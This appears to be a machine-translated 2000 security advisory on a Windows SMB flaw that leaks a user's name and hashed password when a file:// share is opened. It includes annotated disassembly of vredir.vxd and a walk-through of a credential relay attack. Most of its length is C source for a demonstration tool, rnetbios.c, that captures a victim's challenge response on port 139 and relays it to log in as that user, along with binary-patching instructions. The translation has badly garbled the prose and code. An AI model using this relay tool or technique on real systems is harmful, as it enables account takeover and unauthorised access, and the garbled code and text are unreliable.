Release Date: 2002-09-19
Article content:
Date: 2000-04-12
Author: Yuan brother
Home:
http://www.nsfocus.com
Vulnerability Description:
When the Windows system accesses the shared file (File: // Protocol, you can mix this agreement in HTM),
It will automatically try the identity connection of the current user (send the user name, encrypted password), if not
Connection prompts the user to enter the username and password, so password leakage.
Impact version: Win95, Win98, WinNT, Win2000.
Remedy: find Microsoft.
Below is the disclosure password related code analysis of Win98 system. This is a piece of code for file Vredir.vxd:
15760 SUB_0285 Proc Near
15760 55 Push EBP
15761 8B EC MOV EBP, ESP
15763 83 EC 0C SUB ESP, 0CH
15766 33 C0 xor Eax, EAX
15768 53 Push EBX
15769 56 Push ESI
1576A 57 Push EDI
1576B 8B 7D 08 MOV EDI, DWORD PTR [EBP Parameter_1]
1576E 8B 5D 14 MOV EBX, DWORD PTR [EBP Parameter_4]
15771 66 | C7 43 01 00ff Mov Word PTR [EBX 1], 0FFH
15777 8B 77 1C MOV ESI, DWORD PTR [EDI 1CH]
1577A 8A 47 05 MOV Al, Byte PTR [EDI 5]
1577D 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
15780 C6 03 0D MOV BYTE PTR [EBX], 0DH
15783 8B 0C 85 00000AE0 MOV ECX, DWORD PTR DATA_0114 [EAX * 4];
1578A 8B 45 18 MOV EAX, DWORD PTR [EBP Parameter_5]
1578D 66 | 89 43 05 MOV WORD PTR [EBX 5], AX
15791 89 4D F8 MOV DWORD PTR [EBP LOCAL_2], ECX
The Login User Block User Information Block
15794 66 | 0F B6 4A 18 MOVZX CX, Byte Ptr [EDX 18h]
15799 66 | 89 4B 07 MOV WORD PTR [EBX 7], CX
1579D 8D 42 2C Lea Eax, DWORD PTR [EDX 2CH]
157A0? 0 Push EAX
157A1 E8 FffAda Call Sub_0282
157A6 66 | 89 43 09 MOV WORD PTR [EBX 9], AX
157AA 83 C4 04 Add ESP, 4157AD C7 43 13 00000000 MOV DWORD PTR [EBX 13H], 0
157B4 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
157B7 C7 43 17 00000000 MOV DWORD PTR [EBX 17h], 0
157BE 8B 4A 28 MOV ECX, DWORD PTR [EDX 28H]
157C1 89 4B 0B MOV DWORD PTR [EBX 0BH], ECX
Key
157C4 66 | 8B 4A 1A MOV CX, Word PTR [EDX 1AH]
157C8 66 | 8B C1 MOV AX, CX
157CB 66 | 25 0200 And Ax, 200h
157CF 66 | 3D 0001 CMP AX, 1
157D3 B8 00000000 MOV EAX, 0
157D8 83 D0 FF ADC EAX, 0FFFFFFFFH
157DB 66 | 83 E1 03 and CX, 3
157DF 83 E0 04 And Eax, 4
157E2 66 | 83 F9 01 CMP CX, 1
157E6 89 43 17 MOV DWORD PTR [EBX 17h], EAX
157E9 1B C9 SBB ECX, ECX
157EB 41 Inc ECX
157ec 0b C8 or ECX, EAX
157ee 83 7D F8 00 CMP DWORD PTR [EBP LOCAL_2], 0
157F2 89 4B 17 MOV DWORD PTR [EBX 17H], ECX
157F5 0F 84 00000244 JZ LOC_1740
157FB 8A 4A 19 MOV CL, Byte Ptr [EDX 19H]
; Security Mode security mode
Is the data sent by the service party, so the server can actively change according to it needs
157FE F6 C1 01 TEST CL, 1
15801 0F 84 000001CB JZ LOC_1739
User or Share Mode
Sharing control jump
15807 80 7F 05 02 CMP BYTE PTR [EDI 5], 2
1580B 75 53 JNE SHORT LOC_1729
1580D 8B 45 F8 MOV EAX, DWORD PTR [EBP LOCAL_2]
15810 8B 70 28 MOV ESI, DWORD PTR [EAX 28H]
15813 85 F6 Test ESI, ESI
15815 74 12 JZ Short Loc_1726
15817 8D 7B 1D Lea EDI, DWORD PTR [EBX 1DH]
1581A B9 00000006 MOV ECX, 6
1581F F3 / A5 Rep MOVSD
15821 66 | C7 43 0F 0018 MOV WORD PTR [EBX 0FH], 18H; Password Long
15827 EB 06 JMP Short Loc_1727
15829 LOC_1726:
15829 66 | C7 43 0F 0000 MOV WORD PTR [EBX 0FH], 0
1582F LOC_1727:
1582F 33 C0 XOR EAX, EAX
15831 8B 4D F8 MOV ECX, DWORD PTR [EBP LOCAL_2]
15834 66 | 8B 43 0F MOV AX, Word PTR [EBX 0FH]
15838 8B 71 2C MOV ESI, DWORD PTR [ECX 2CH]
1583B 85 F6 Test ESI, ESI
1583D 8D 7C 18 1D LEA EDI, DWORD PTR [EAX 1DH] [EBX]
15841 74 12 JZ Short Loc_1728
15843 B9 00000006 MOV ECX, 6
15848 F3 / A5 Rep MOVSD
1584A 66 | C7 43 11 0018 MOV Word PTR [EBX 11H], 18H
15850 E9 000000E8 JMP LOC_1736
15855 LOC_1728:
15855 66 | C7 43 11 0000MOV Word PTR [EBX 11H], 0
1585B E9 000000DD JMP LOC_1736
15860 LOC_1729:
15860 C7 45 FC 00001A78 MOV DWORD PTR [EBP LOCAL_1], 1A78H
15867 F6 46 1C 20 Test Byte PTR [ESI 1CH], 20H
1586B 74 08 JZ Short Loc_1730
1586D 83 C6 35 Add ESI, 35H
15870 89 75 FC MOV DWORD PTR [EBP LOCAL_1], ESI
15873 EB 12 JMP Short Loc_1731
15875 Loc_1730:
15875 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
15878 8B 42 0C MOV EAX, DWORD PTR [EDX 0CH]
1587B F6 40 1C 20 Test Byte PTR [EAX 1CH], 20H
1587F 74 06 JZ Short Loc_1731
15881 83 C0 35 Add Eax, 35H
; The Password Pointer
15884 89 45 FC MOV DWORD PTR [EBP LOCAL_1], EAX
15887 LOC_1731:
15887 8B 45 FC MOV EAX, DWORD PTR [EBP LOCAL_1] 1588A 80 38 00 CMP BYTE PTR [EAX], 0;
The Password
1588D 75 09 JNE Short Loc_1732
In comparison, if you enter a password, if you do not have a password, use the user password to replace it.
Because I have not yet prompted to prompt the password, there are several password experiments.
Therefore, there must be no password, and then the current user password is blocked.
1588F 8B 45 F8 MOV EAX, DWORD PTR [EBP LOCAL_2]
15892 83 C0 05 Add Eax, 5
15895 89 45 FC MOV DWORD PTR [EBP LOCAL_1], EAX
; Log in to the password of the Windows user replace the pointer without password
This creates a leak password vulnerability
15898 LOC_1732:
15898 F6 C1 02 TEST CL, 2
; Password encryption? Security mode sent by the server
1589B 66 | C7 43 0F 0018 MOV Word PTR [EBX 0FH], 18H
Password Long
158A1 66 | C7 43 11 0000 MOV Word PTR [EBX 11H], 0
158A7 74 76 JZ Short Loc_1734
; Password does not encrypt jump
158A9 F6 C1 0C Test CL, 0CH
158ac 74 3C JZ Short Loc_1733
158AE 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
158B1 F6 42 14 02 Test Byte PTR [EDX 14H], 2
158B5 75 33 JNZ Short Loc_1733
158B7 8D 73 1D LEA ESI, DWORD PTR [EBX 1DH]
158BA 8B 45 FC MOV EAX, DWORD PTR [EBP LOCAL_1]
158BD 56 Push ESI
158BE 50 Push EAX
158BF 8D 42 6C LEA EAX, DWORD PTR [EDX 6CH]
158C2 50 Push EAX
158C3 E8 FFF15F4 CALL SUB_0068
Lock The Password
158C8 83 C4 0C Add ESP, 0CH
158CB 8B 4D 10 MOV ECX, DWORD PTR [EBP Parameter_3]
158CE 81 C1 0000009C Add ECX, 9CH
158D4 8B 06 MOV EAX, [ESI]
158D6 89 01 MOV [ECX], EAX
158D8 8B 56 04 MOV EDX, DWORD PTR [ESI 4]
158DB 89 51 04 MOV DWORD PTR [ECX 4], EDX158DE 8B 7e 08 MOV EDI, DWORD PTR [ESI 8]
158E1 89 79 08 MOV DWORD PTR [ECX 8], EDI
158E4 8B 46 0C MOV EAX, DWORD PTR [ESI 0CH]
158E7 89 41 0C MOV DWORD PTR [ECX 0CH], EAX
158EA LOC_1733:
158EA 8D 73 1D LEA ESI, DWORD PTR [EBX 1DH]
158ed 8b 45 FC MOV EAX, DWORD PTR [EBP LOCAL_1]
158F0 56 Push ESI
158F1 50 Push EAX
158F2 8B 45 10 MOV EAX, DWORD PTR [EBP Parameter_3]
158F5 83 C0 6C Add Eax, 6ch
158F8 50 Push EAX
158F9 E8 FFF15B8 CALL SUB_0067
158FE 83 C4 0C Add ESP, 0CH
15901 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
15904 F6 42 19 0C Test Byte PTR [EDX 19H], 0CH
15908 74 33 JZ Short Loc_1736
1590A F6 42 14 02 Test Byte PTR [EDX 14H], 2
1590E 75 2D JNZ Short Loc_1736
15910 8D BA 00000084 Lea EDI, DWORD PTR DATA_0010 [EDX]
15916 B9 00000006 MOV ECX, 6
1591B F3 / A5 Rep MOVSD
1591D EB 1E JMP Short Loc_1736
1591F LOC_1734:
; No cryptographic password to this
1591F 80 3D 000001E0 00 CMP BYTE PTR DATA_0041, 0;
Do you have a clear text password?
An enableplaintextpassword setting in the registry, but now the default is not allowed.
If you can get a clear text password?
15926 74 0F Je Short Loc_1735
15928 8D 7B 1D LEA EDI, DWORD PTR [EBX 1DH]
1592B 8B 75 FC MOV ESI, DWORD PTR [EBP LOCAL_1] 1592E B9 00000006 MOV ECX, 6
15933 F3 / A5 Rep MOVSD
; The Password, Not Lock
15935 EB 06 JMP Short Loc_1736
15937 LOC_1735:
15937 66 | C7 43 0F 0000 MOV WORD PTR [EBX 0FH], 0
1593D LOC_1736:
1593D 8B 75 F8 MOV ESI, DWORD PTR [EBP LOCAL_2]
15940 B9 fffffff MOV ECX, 0FFFFFFFH
15945 83 C6 13 Add ESI, 13H
15948 2B C0 SUB EAX, EAX
1594A 8B Fe Mov Edi, ESI
1594C F2 / AE RepNE scaSB
1594E F7 D1 NOT ECX
15950 8B C1 MOV EAX, ECX
15952 33 D2 XOR EDX, EDX
15954 66 | 8B 53 11 MOV DX, Word PTR [EBX 11h]
15958 33 C9 xor ECX, ECX
1595A 66 | 8B 4B 0F MOV CX, Word PTR [EBX 0FH]
1595e 03 CA Add ECX, EDX
15960 8B 55 10 MOV EDX, DWORD PTR [EBP PARAMETER_3]
15963 8D 7C 19 1D LEA EDI, DWORD PTR [ECX 1DH] [EBX]
15967 66 | 8B 4A 1A MOV CX, Word PTR [EDX 1AH]
1596B 89 7D FC MOV DWORD PTR [EBP LOCAL_1], EDI
1596E F6 C5 02 Test Ch, 2
15971 74 2F JZ Short Loc_1737
15973 F6 C1 80 TEST CL, 80H
15976 74 2A JZ Short Loc_1737
15978 83 3D 0000190C 00 CMP DWORD PTR DATA_0161, 0
1597F 74 21 Je Short Loc_1737
15981 8B CF MOV ECX, EDI
15983 6A 01 Push DWORD PTR 1
15985 2B 4D 0C SUB ECX, DWORD PTR [EBP Parameter_2] 15988 50 Push EAX
15989 83 E1 01 and ECX, 1
1598C 56 Push ESI
1598D 66 | 01 4B 1B Add Word PTR [EBX 1BH], CX
15991 01 4D FC Add DWORD PTR [EBP LOCAL_1], ECX
15994 8B 4D FC MOV ECX, DWORD PTR [EBP LOCAL_1]
15997 51 Push ECX
15998 e8 fff1679 call sub_0097
1599D 83 C4 10 Add ESP, 10h
159A0 EB 11 JMP Short Loc_1738
159A2 LOC_1737:
159A2 8B 7D FC MOV EDI, DWORD PTR [EBP LOCAL_1]
159A5 8B C8 MOV ECX, EAX
159A7 C1 E9 02 SHR ECX, 2
159AA F3 / A5 Rep MOVSD
159ac 8b C8 MOV ECX, EAX
159AE 83 E1 03 and ECX, 3
159B1 F3 / A4 Rep MOVSB
159b3 Loc_1738:
159B3 66 | 8B 4B 0F MOV CX, Word PTR [EBX 0FH]
159B7 8B 55 FC MOV EDX, DWORD PTR [EBP LOCAL_1]
159BA 66 | 03 4B 11 Add CX, Word PTR [EBX 11h]
159BE 03 D0 Add Edx, EAX
159C0 66 | 03 C8 Add CX, AX
159C3 66 | 89 4B 1B MOV WORD PTR [EBX 1BH], CX
159C7 8B 4D 0C MOV ECX, DWORD PTR [EBP Parameter_2]
159CA 89 51 3A MOV DWORD PTR [ECX 3AH], EDX
159CD E9 0000008A JMP LOC_1741
159D2 LOC_1739:
159D2 C6 43 1D 00 MOV BYTE PTR [EBX 1DH], 0
159D6 8B 75 F8 MOV ESI, DWORD PTR [EBP LOCAL_2]
159D9 B9 fffffff MOV ECX, 0FFFFFFFH
159DE C6 43 1E 00 MOV BYTE PTR [EBX 1EH], 0159E2 66 | C7 43 11 0001 MOV WORD PTR [EBX 11H], 1
159E8 66 | C7 43 0F 0001 MOV Word PTR [EBX 0FH], 1
159ee 83 C6 13 Add ESI, 13H
159F1 2B C0 SUB EAX, EAX
159f3 8b Fe Mov Edi, ESI
159f5 f2 / ae repne scaSB
159f7 F7 D1 NOT ECX
159F9 8B D1 MOV EDX, ECX
159fb 33 c9 xor ECX, ECX
159FD 66 | 8B 4B 11 MOV CX, Word PTR [EBX 11h]
15A01 8D 42 02 LEA EAX, DWORD PTR [EDX 2]
15A04 66 | 89 43 1B MOV WORD PTR [EBX 1BH], AX
15A08 33 C0 XOR EAX, EAX
15A0A 66 | 8B 43 0F MOV AX, Word PTR [EBX 0FH]
15A0E 03 C1 Add Eax, ECX
15A10 8B CA MOV ECX, EDX
15A12 C1 E9 02 SHR ECX, 2
15A15 8D 7C 18 1D LEA EDI, DWORD PTR [EAX 1DH] [EBX]
15A19 F3 / A5 Rep MOVSD
The user name
15A1B 8B CA MOV ECX, EDX
15A1D 83 E1 03 and ECX, 3
15A20 F3 / A4 Rep MOVSB
15A22 33 F6 XOR ESI, ESI
15A24 33 C0 XOR EAX, EAX
15A26 66 | 8B 73 0F MOV Si, Word PTR [EBX 0FH]
15A2A 8B 4D 0C MOV ECX, DWORD PTR [EBP Parameter_2]
15A2D 66 | 8B 43 11 MOV AX, Word PTR [EBX 11h]
15A31 03 F0 Add ESI, EAX
15A33 03 F2 Add ESI, EDX
15A35 03 F3 Add ESI, EBX
15A37 83 C6 1D Add ESI, 1DH
15A3A 89 71 3A MOV DWORD PTR [ECX 3ah], ESI
15A3D EB 1D JMP Short Loc_174115A3F LOC_1740:
15A3F 33 C0 XOR EAX, EAX
15A41 8D 53 1F LEA EDX, DWORD PTR [EBX 1FH]
15A44 66 | 89 43 0F MOV WORD PTR [EBX 0FH], AX
15A48 66 | 89 43 11 MOV WORD PTR [EBX 11H], AX
15A4C 66 | 89 43 1D MOV WORD PTR [EBX 1DH], AX
15A50 8B 45 0C MOV EAX, DWORD PTR [EBP Parameter_2]
15A53 66 | C7 43 1B 0002 MOV WORD PTR [EBX 1BH], 2
15A59 89 50 3A MOV DWORD PTR [EAX 3AH], EDX
15A5C LOC_1741:
15A5C 8B 55 10 MOV EDX, DWORD PTR [EBP Parameter_3]
15A5F 66 | 8B 42 1A MOV AX, Word PTR [EDX 1AH]
15A63 F6 C4 02 Test Ah, 2
15A66 0F 84 000000C9 JZ LOC_1744
15A6C A8 80 TEST Al, 80h
15A6E 0F 84 000000C1 JZ LOC_1744
15A74 83 3D 0000190C 00 CMP DWORD PTR DATA_0161, 0
15A7B 0F 84 000000B4 JE LOC_1744
15A81 8B 4D 0C MOV ECX, DWORD PTR [EBP Parameter_2]
15A84 83 7D F8 00 CMP DWORD PTR [EBP LOCAL_2], 0
15A88 8B 71 3A MOV ESI, DWORD PTR [ECX 3AH]
15A8B 89 75 FC MOV DWORD PTR [EBP LOCAL_1], ESI
15A8E 74 1E JZ Short Loc_1742
15A90 8B 55 F8 MOV EDX, DWORD PTR [EBP LOCAL_2]
15A93 83 C2 30 Add EDX, 30H
15A96 80 3A 00 CMP BYTE PTR [EDX], 0
15A99 74 13 Je Short Loc_1742
15A9B 8B FA MOV EDI, EDX
15A9D B9 fffffff MOV ECX, 0FFFFFFFH
15AA2 2B C0 SUB EAX, EAX
15AA4 6A 01 PUSH DWORD PTR 1
15AA6 F2 / AE RepNE scaSB
15AA8 F7 D1 NOT ECX
15AAA 51 PUSH ECX
15AB 52 Push EDX
15AAC EB 18 JMP Short Loc_1743
15AAE LOC_1742:
15AE BF 000021D2 MOV EDI, 21D2H
15AB3 B9 fffffff MOV ECX, 0FFFFFFFH
15AB8 2B C0 SUB EAX, EAX
15ABA 6A 01 Push DWORD PTR 1
15ABC F2 / AE Repne Scasb
15ABE F7 D1 NOT ECX
15ac 0 51 Pushecx
The password obtained is generally encrypted, but it can be broken offline, in fact there is an attack. Let us first come
Take a look at the connection process of the SMB. Below is the SMB password authentication method, the 139-port access process of Windows,
Arrow indicates data direction:
1, client <-------------------- Create TCP connection ----------------> Services
2, client ------- client type, supported service method list, etc. ----------->
3, client <------ server support protocol, authentication method, encrypted key, etc. ----- server
The authentication method is user-level authentication or shared grade authentication and password encryption. Key is the server randomly generated.
8 bytes, Win2000 has supported 16 bytes of Key.
4, client -------------- User name, encryption password -----------------> server
Win9x, winnt, win2000 is a vulnerability, without prompting, etc., encrypt the current user name, password encryption
I have sent it, causing password leaks. This is encrypted here is the deformation of DES, LockedPass = CHGDES (Key, Pass).
The pass of this is the key to the DES-deformed key, and Key is a DES-deformable data.
5, the client <---------------------------------- Serve
Windows clients have a vulnerability in step 4, obviously the server can get UserName and
LockedPass = chgdes (key, pass), where Key can freely specify because this is the service provider,
USNAME, Pass is the client's current visitor user name and password. The encryption transformation here is not reversible, but already
It can be cracked with a violent method, and there is already such a procedure. In fact, we don't have to get a password.
Obvious, as long as it is necessary to provide a connection. Let's see what is used by LockedPass, I
Continue to visit, telnet, ftp, etc. should password, we get the LockedPass that we get.
For supply, then we consider using the same plus algorithm to pass the password-text service? This is, NetBIOS sharing suit
. The front is the server to get something, that is now standing on the client, then look at the process, obviously
We don't need to provide PASS, or just need to provide username and lockedpass2 = chgdes (key2, pass)? Where KEY2 is provided now. See if we have
USNAME and LOCKEDPASS = chgdes (key, pass) where we can specify yourself, everyone is apparent
As long as the key = key2 is needed, is there? So we have to make Key = key2.
Ok, let's take a closer look at the connection process, others connect two steps 1, 2:
1, client <-------------------- Create TCP connection ----------------> Services
2, client -------- client type, supported service method list, etc. --------->
Here:
3, client <-------- server authentication method, encrypted KEY, etc. ----------- server
This we need to provide Key, which we can't provide Key casually, need to provide Key2, then we have to get
Key2, obviously needs to connect to the NetBIOS service back. Obviously this is needed 11, 22, 33 a total of 3 steps
(In order to distinguish the connection back, it is said to get Key2, apparently these 2 steps and 3 steps do not need
Successful order. So we can get the NetBIOS service that specifies the IP and then wait for this user to access it.
Can have time to time out, or wait until any IP connection to the NetBIOS service, come back soon, how to
It is convenient to meet what needs to do. The following is obviously setting key = key2 back 3, then wait for 4 get
LockedPass, step 5, you will freely handle it, don't return your password error, followed by 44, 55. . . .
The total is 1, 2, 11, 22, 33, 3, 4, 5, 44, 55. . . . . Obviously you are using the machine
Ask your user's identity to visit his NetBIOS service, can do what the user's permissions are.
Below is the procedure I have to use this vulnerability, because it is to demonstrate this vulnerability, so the program is not finished.
nice. You can run in Win9x because it is a daemon of 139, so you need to run the machine.
The 139 mouth of the body is turned off, and can be in VNBT. Looking for HEX: 68 8B 00 00 00 (NetBIOS) in 386 file
On the 139-port code, 0x8B = 139), changed to 68 EF 00 00 00, the 139 port of itself became 239. also
Disks with Winnt systems are generally shared as Drive $, not displayed in sharing, or modify it on the client
It shows to facilitate viewing. Modifying method, file msnp32.dll, find HEX: 8B 74 24 10 6A 24
56 E8, it is possible to change to 8B 74 24 10 6A FF 56 E8. If the version is different, you may HEX is not
The same, so if you can't find it, you can find a little HEX, such as 6A 24? ? E8, "??" means any
One byte data. Because the msno32.dll file is always open, it can copy one first
Send, modify copy, turn it to DOS, overwrite back.
// rnetbios.c
// useage: rnetbios [ip] [ip]
#include
#include
Void PrintFusage (int Argc, char * argv);
Void testConnect ();
Void get_d_ip (int Argc, char * argv);
Void setserver ();
Void OpenFD3 (int Argc, Char * Argv);
Void OpenSockFD4 (int Argc, Char * Argv);
void set_servername ();
void recvpacket ();
Void recvfd2packet ();
Void out ();
Char * server;
CHAR BUFF [20480];
CHAR BUFF0X72 [20480];
CHAR BUFF0X73 [20480];
CHAR BUFF0X82 [] = {0x82, 0, 0, 0, 0, 0};
CHAR NameReq [] = {0x81, 0, 0, 0};
INT long72 = 0;
INT long73 = 0;
Struct SockAddr_in S_IN, S_IN2, S_IN3, S_IN4;
Struct SockAddr Addr, Addr2;
Struct hostent * he;
INT usernameaddress1;
INT usernameaddress2;
Int strflg1, strflg2;
INT loginhimseelf;
INT FD, FD2, FD3, FD4;
INT I, J, K, L;
Socket D_IP;
Char servername [] = {"* SMBServer"};
// Win9x does not support, just able to filter Win9x
U_SHORT ServerPort = 139;
U_SHORT NAME;
Char buffgetname [] = {0x00, 0x72, 0x00, 0x10, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x20, 0X43, 0X4B, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41,
0x41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41,
0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0x00, 0X00, 0X21, 0x00, 0X01};
Char namebuff [] = {0x81, 0, 0, 0X44, 0X20, 0X45, 0X4F, 0X45, 0X42, 0X45, 0X4A,
0x43, 0X48, 0X46, 0X444, 0X43, 0X41, 0X46, 0X48, 0X45, 0X50, 0X46, 0X43, 0X45, 0X4D,
0x45, 0X45, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 100, 0X20,
0x41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X41, 0X43, 0X41,
0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41, 0X43, 0X41,
0x43, 0x41, 0X41, 0X41, 00};
INT main (int Argc, char ** argv)
{
PrintFusage (Argc, Argv [0]);
TestConnect ();
set_servername ();
GET_D_IP (Argc, Argv [1]);
setServer ();
While (1) {
I = SIZEOF (Struct SockAddr);
FD2 = -1;
While (fd2 <= 0) {fd2 = accept (fd, & addr, & i);
}
Memcpy (& S_IN2, & ADR, 15);
S_IN2.SIN_FAMILY = AF_INET;
S_IN2.SIN_PORT = HTONS (ServerPort);
IF (loginhimself == 1) {
S_IN4.SIN_ADDR.S_ADDR = S_IN2.SIN_ADDR.S_ADDR;
}
Printf ("/ n now% s", INET_NTOA (S_IN2.SIN_ADDR);
Printf ("Begin Netbios Connect% S", INET_NTOA (S_IN4.SIN_ADDR);
IF (loginhimself == 0) s_in2.sin_addr.s_addr = d_ip;
FD3 = Socket (AF_INET, SOCK_STREAM, 0);
J = 0;
K = 0;
L = 0;
OpenFD3 (Argc, Argv [2]);
Printf ("/ n can't Connect% S", INET_NTOA (S_IN2.SIN_ADDR);
CloseSocket (FD2);
CloseSocket (FD3);
}
OUT ();
Return (0);
}
Void PrintFusage (Argc, Argv)
{
Printf ("/ N RNETBIOS VER 1.0.");
Printf ("/ n copywrite by yuan 2000.4.7.");
Printf ("/ N Wellcome to my homepage
http://yuange.yeah.net. ");
Printf ("/ n usage:% s [ip] [ip]", argv);
// argv [0]);
}
Void testConnect ()
{
Wsadata wsadata;
Int result;
Result = WSASTARTUP (Makeword (1, 1), & WSADATA);
IF (Result! = 0) {
FPRINTF (stderr, "Your Computer Was Not Connected"
"To the Internet at the time That"
"this program was launched, or you"
"Do Not Have A 32-bit"
"Connection to the Internet.");
Exit (1);
}
}
Void set_servername ()
{
INT I, J;
J = 0;
For (i = 0; i <16; i) {
Name = Servername [i];
IF (Name == 0) j = 1;
IF (j == 1) Name = 0x20;
NameBuff [2 * i 5] = ((Name >> 4) & 0x000f) 'A';
NameBuff [2 * i 6] = (Name & 0x000F) 'A';
}
Namebuff [37] = 0;
}
Void OpenSockfd4 (Argc, Argv)
{
Printf ("/ N please use the next ip login.");
I = SIZEOF (Struct SockAddr); FD4 = Accept (FD, & Addr2, & i);
Memcpy (& S_IN3, & Addr2, 15);
S_IN3.SIN_FAMILY = AF_INET;
S_IN3.SIN_PORT = HTONS (ServerPort);
IF (argc> = 3) {
Server = argv;
D_IP = inet_addr (server);
}
IF (D_IP == - 1) D_IP = INET_ADDR ("127.0.0.1");
// But as if 127.0.0.1 cannot be used to access NetBIOS?
Printf ("/ n the next ip% s", inet_ntoa (s_in3.sin_addr);
IF (s_in3.sin_addr.s_addr! = D_IP && D_IP! = 0) CloseSocket (FD4);
Else {
i = 1;
IOCTLSOCKET (FD4, Fionbio, & I);
While (k == 0) {
BUFF [0] = 0;
BUF [8] = 0;
I = RECV (FD4, BUFF, 20480, 0);
IF (i == 0) {
CloseSocket (FD4);
Printf ("/ n fd4 close");
Return;
}
IF (Memcmp (Buff, Namereq, 3) == 0) {
Send (FD4, BUFF0X82, 6, 0);
Printf ("/ N Send Name 0x82 Packet.");
}
IF (buff [8] == 0x72) {
Memcpy (buff0x72 0x1c, buff 0x1c, 8);
Memcpy (BUFF, BUFF0X72, Long72);
Printf ("/ N Send SMB 0x72 Packet.");
BUFF [0x25] = 5;
// Run in Win9x.The Win9x Netbios Client USE
// This client may want WIN9X, do not know Wint. How to handle Win2000.
Send (FD4, BUFF, LONG72, 0);
}
IF (buff [8] == 0x73 || BUFF [8] == 0x75) {
Long73 = i;
// Memcpy (buff 0x1c, BUFF0X73 0x1c, 8);
Printf ("/ N Send SMB 0x73 Packet.");
IF (buff [0x33] == 0x18) {
Memcpy (buff 0x41, buff0x73 0x41, 0x18);
// Copy Password
IF (Buff [0x35] == 0x18) Memcpy (buff 0x41 0x18, buff0x73 0x41 0x18, 0x18);
// Copy the next password
Strflg1 = buff0x73 [0x0f];
Strflg1 & = 0x80;
IF (strflg1! = 0) strflg1 = 1;
Strflg2 = buff [0x0f];
Strflg2 & = 0x80;
IF (strflg2! = 0) strflg2 = 1;
// STR IS Unicode?
UserNameAddress1 = 0x41 0x18 buff0x73 [0x35] strflg1; usernameaddress2 = 0x41 0x18 buff [0x35] strfl2;
Name = 1;
While (Name! = 0) {
Name = buff0x73 [usernameAddress1];
IF (strflg1 == 0) usernameAddress1;
Else UserNameAddress1 = 2;
BUFF [usernameaddress2] = name;
usernameaddress2;
IF (strflg2! = 0) {
usernameaddress2;
BUFF [usernameaddress2] = 0;
}
}
// Copy User Name, not rigorous enough, but it can be used.
Printf ("/ N Send The Pass 0x% X Bytes", long73);
}
Else Printf ("/ n can't chang pass";
// buff [0x9] = 0;
Send (FD3, BUFF, LONG73, 0);
// While (k == 0) {// How to deal with it?
I = RECV (FD3, BUFF, 20480, 0);
// if (i> 0 && buff [0x9] == 0) Printf ("/ n now login ok.");
// if (i> 0) {
// k = 1;
// Send (FD4, BUFF, I, 0);
// Printf ("/ N Send FD4 0x73 Packet 0x% X Bytes", I);
//}
//}
K = 1;
// i = -1;
}
}
}
}
void recvpacket ()
{
IF (j == 0) Recvfd2packet ();
ELSE I = RECV (FD4, BUFF, 20480, 0);
IF (i == 0) {
IF (j == 0) {
Printf ("/ n fd2 close.");
Return;
}
Else {
Printf ("/ N fd4 close.");
K = 0;
CloseSocket (FD4);
}
}
}
void recvfd2packet ()
{
BUF [0x8] = 0;
I = RECV (FD2, BUFF, 20480, 0);
IF (buff [0x8] == 0x72) {
Memcpy (buff0x72, buff, i);
MEMSET (BUFF 0xC, 0, 4);
// This is the mark of the system to support what services, Win2000 is different from the Winnt system.
// The one is Winnt to see usually 0, and both are the password mode of the Win2000 behind the protocol.
// Set to 0, spoof let it send the encrypted password in WinNT, so as to intercept. But it may be not good for Win2000.
Printf ("/ N fd2 Recv SMB 0x72 Packet");
}
IF (Buff [0x8] == 0x73 || BUF [0x8] == 0x75) {
K = 0;
Memcpy (buff0x73, buff, i);
IF (buff0x73 [0x24] == 0x0c) PRINTF ("/ n this is win2000 system?");
Printf ("/ N Get Password from FD2.");
}
}
Void get_d_ip (argc, argv)
{
D_IP = -1;
IF (argc> = 2) {
Server = argv;
D_IP = inet_addr (server);
IF (D_IP == - 1) {
He = gethostByname (Server);
IF (! HE) Printf ("/ n can't get the ip of% s! / n", server);
Else Memcpy (& D_IP, HE-> H_ADDR, 4);
}
}
IF (D_IP == 0) D_IP = -1;
IF (D_IP == - 1) {
Loginhimseelf = 1;
Printf ("/ N RNETBIOS THE NetBIOS IP.");
}
Else {
Loginhimself = 0;
Printf ("/ N RNETBIOS TO% S", Server);
}
S_IN4.SIN_ADDR.S_ADDR = D_IP;
}
Void setserver ()
{
FD = Socket (AF_INET, SOCK_STREAM, 0);
s_in.sin_family = af_INet;
s_in.sin_port = HTONS (Serverport);
S_IN.SIN_ADDR.S_ADDR = 0;
I = SIZEOF (Struct SockAddr);
Bind (fd, & s_in, i);
Listen (FD, 100);
}
Void OpenFD3 (Argc, Argv)
{
IF (! Connect (FD3, Struct SockAddr *) & S_IN2, SIZEOF (Struct SockAddr_in))))))
{
i = 1;
IOCTLSOCKET (FD2, Fionbio, & I);
i = 1;
IOCTLSOCKET (FD3, Fionbio, & I);
While (1)
{
Recvpacket ();
// if (i == 0) {
// Printf ("/ n fd2 or fd4 close.");
// Break;
//}
IF (i> 0) {
IF (MemcMP (BUFF, NameReq, 3) == 0) Send (FD3, NameBuff, 0x48, 0);
Else {
Send (FD3, BUFF, I, 0);
Printf ("/ N Send FD3 0x% X Packet", BUFF [8]);
}
}
BUF [8] = 0;
I = RECV (FD3, BUFF, 2048, 0);
IF (i> 0) Printf ("/ N Recv FD3 0x% x Packet 0x% X Bytes", BUFF [0x8], I);
IF (i> 0 && j == 0) {IF (buff [8] == 0x72) {
Memcpy (buff0x72, buff, i);
Long72 = i;
}
IF (buff [8] == 0x73 || BUFF [8] == 0x75) {
IF (Buff [0x9] == 0 && buff0x73 [0x33] == 0x18) {
J = 1;
CloseSocket (FD2);
Printf ("/ n now fd2 login ok!");
}
}
}
IF (i == 0) {
